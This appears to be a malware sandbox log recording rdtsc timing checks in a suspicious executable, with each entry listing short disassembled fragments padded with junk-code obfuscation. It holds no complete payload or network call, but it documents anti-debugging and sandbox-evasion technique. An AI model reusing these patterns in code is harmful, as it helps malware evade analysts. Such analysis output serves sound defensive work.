Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01B5 second address: 4FF01F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F5F64D1DF27h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5F64D1DF25h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01F0 second address: 4FF0200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0200 second address: 4FF0217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5F64D1DF1Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010C6D second address: 5010CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F5F64D1DAC3h 0x0000000c sub si, 6C3Eh 0x00000011 jmp 00007F5F64D1DAC9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5F64D1DABAh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010CB7 second address: 5010D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F5F64D1DF22h 0x0000000f or al, FFFFFF98h 0x00000012 jmp 00007F5F64D1DF1Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c call 00007F5F64D1DF24h 0x00000021 mov cx, AAD1h 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 call 00007F5F64D1DF1Dh 0x0000002d pop eax 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D1C second address: 5010D2A instructions: 0x00000000 rdtsc 0x00000002 mov dh, 83h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D2A second address: 5010D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D2E second address: 5010D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D32 second address: 5010D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D38 second address: 5010D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D3E second address: 5010D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010D42 second address: 5010D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107C0 second address: 50107C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107C6 second address: 50107FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DAC7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107FA second address: 50107FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50107FF second address: 501084D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5F64D1DAC5h 0x0000000a adc esi, 46A16D36h 0x00000010 jmp 00007F5F64D1DAC1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov ecx, edi 0x0000001d call 00007F5F64D1DAC3h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501084D second address: 501087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5F64D1DF1Eh 0x00000010 jmp 00007F5F64D1DF25h 0x00000015 popfd 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501087E second address: 5010883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50106A2 second address: 50106E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DF21h 0x00000009 sub cl, FFFFFFD6h 0x0000000c jmp 00007F5F64D1DF21h 0x00000011 popfd 0x00000012 mov bh, ch 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5F64D1DF1Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50106E3 second address: 501070A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ax, 5A27h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007F5F64D1DABAh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 79118370h 0x0000001f push ebx 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501070A second address: 5010747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DF20h 0x00000009 or cl, FFFFFFB8h 0x0000000c jmp 00007F5F64D1DF1Bh 0x00000011 popfd 0x00000012 mov di, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5F64D1DF21h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010747 second address: 5010784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 add esi, 4D377ADEh 0x0000000f jmp 00007F5F64D1DAC9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50102E5 second address: 5010302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010302 second address: 5010327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010327 second address: 5010379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c movzx ecx, bx 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007F5F64D1DF1Bh 0x00000017 sub al, FFFFFFBEh 0x0000001a jmp 00007F5F64D1DF29h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push esi 0x00000027 pop edx 0x00000028 mov bx, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50202E3 second address: 50202E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50202E8 second address: 5020366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e jmp 00007F5F64D1DF21h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F5F64D1DF21h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c jmp 00007F5F64D1DF1Ch 0x00000021 jmp 00007F5F64D1DF22h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007F5F64D1DF20h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F5F64D1DF1Ah 0x00000038 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020366 second address: 502036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 502036C second address: 5020371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060030 second address: 50600D3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov ecx, 1B004D2Bh 0x00000018 jmp 00007F5F64D1DAC0h 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov cx, bx 0x00000023 call 00007F5F64D1DABDh 0x00000028 mov si, 1EE7h 0x0000002c pop ecx 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007F5F64D1DAC3h 0x00000034 mov ebp, esp 0x00000036 jmp 00007F5F64D1DAC6h 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5F64D1DAC7h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50600D3 second address: 50600EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303AC second address: 50303B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303B0 second address: 50303B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303B6 second address: 50303D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50303D1 second address: 503040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5F64D1DF28h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503040F second address: 503041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503041E second address: 503046C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3E787AAAh 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F5F64D1DF1Dh 0x00000014 mov eax, dword ptr [ebp+08h] 0x00000017 jmp 00007F5F64D1DF1Eh 0x0000001c and dword ptr [eax], 00000000h 0x0000001f jmp 00007F5F64D1DF20h 0x00000024 and dword ptr [eax+04h], 00000000h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov dx, 4D5Eh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501051E second address: 5010541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DABAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010541 second address: 5010545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010545 second address: 501054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 501054B second address: 5010579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5F64D1DF1Ah 0x0000000b sbb si, 7668h 0x00000010 jmp 00007F5F64D1DF1Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, cx 0x00000020 mov edx, esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010579 second address: 5010593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010593 second address: 50105F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5F64D1DF27h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F5F64D1DF1Bh 0x00000019 adc ch, 0000006Eh 0x0000001c jmp 00007F5F64D1DF29h 0x00000021 popfd 0x00000022 call 00007F5F64D1DF20h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50105F3 second address: 5010646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5F64D1DABEh 0x00000009 sbb cx, 1318h 0x0000000e jmp 00007F5F64D1DABBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F5F64D1DAC8h 0x0000001a sub ch, 00000078h 0x0000001d jmp 00007F5F64D1DABBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF0 second address: 5020EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF4 second address: 5020EF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EF8 second address: 5020EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020EFE second address: 5020F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F1B second address: 5020F3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DF29h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F3F second address: 5020F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F45 second address: 5020F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5020F49 second address: 5020F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F5F64D1DABFh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F5F64D1DAC2h 0x0000001b and cx, 5D58h 0x00000020 jmp 00007F5F64D1DABBh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50301DD second address: 5030201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, dx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5050758 second address: 5050773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5050773 second address: 5050779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 505088E second address: 50508E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 75C4B90Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov ecx, eax 0x0000000d jmp 00007F5F64D1DAC1h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 jmp 00007F5F64D1DAC7h 0x0000001a and ecx, 1Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5F64D1DAC5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000037 second address: 500003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500003D second address: 500006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov ax, di 0x0000000f jmp 00007F5F64D1DAC1h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DABDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500006F second address: 50000CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007F5F64D1DF1Fh 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F5F64D1DF22h 0x0000001b call 00007F5F64D1DF22h 0x00000020 pop esi 0x00000021 popad 0x00000022 mov esi, ebx 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5F64D1DF23h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50000CE second address: 5000175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov edx, 6FC5F4DEh 0x00000011 pop edi 0x00000012 pushfd 0x00000013 jmp 00007F5F64D1DAC4h 0x00000018 jmp 00007F5F64D1DAC5h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 jmp 00007F5F64D1DABCh 0x00000026 mov si, F7A1h 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F5F64D1DAC7h 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 pushad 0x00000034 mov ecx, 0D11DA81h 0x00000039 popad 0x0000003a movsx edi, si 0x0000003d popad 0x0000003e mov ebx, dword ptr [ebp+10h] 0x00000041 jmp 00007F5F64D1DAC4h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a mov ebx, esi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000175 second address: 5000214 instructions: 0x00000000 rdtsc 0x00000002 mov ch, DEh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5F64D1DF25h 0x0000000c adc cl, FFFFFFE6h 0x0000000f jmp 00007F5F64D1DF21h 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov si, dx 0x0000001b movsx ebx, si 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 mov esi, 2A735907h 0x00000026 mov ax, 7EA3h 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e pushad 0x0000002f call 00007F5F64D1DF24h 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 mov ebx, 5453E294h 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov si, DAF5h 0x00000043 pushfd 0x00000044 jmp 00007F5F64D1DF22h 0x00000049 sub cl, 00000048h 0x0000004c jmp 00007F5F64D1DF1Bh 0x00000051 popfd 0x00000052 popad 0x00000053 mov dword ptr [esp], edi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov cl, dh 0x0000005b mov esi, 58F84E53h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000214 second address: 5000229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, D3h 0x00000005 mov ecx, 726C52A7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000229 second address: 500022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500022F second address: 5000235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000235 second address: 5000285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F5FD6C4C2D8h 0x00000011 pushad 0x00000012 mov al, CEh 0x00000014 popad 0x00000015 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001c jmp 00007F5F64D1DF25h 0x00000021 je 00007F5FD6C4C2C8h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000285 second address: 5000289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000289 second address: 500028F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500028F second address: 50002E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F5F64D1DAC0h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5F64D1DABDh 0x0000001d and si, C396h 0x00000022 jmp 00007F5F64D1DAC1h 0x00000027 popfd 0x00000028 mov eax, 32440807h 0x0000002d popad 0x0000002e rdtsc
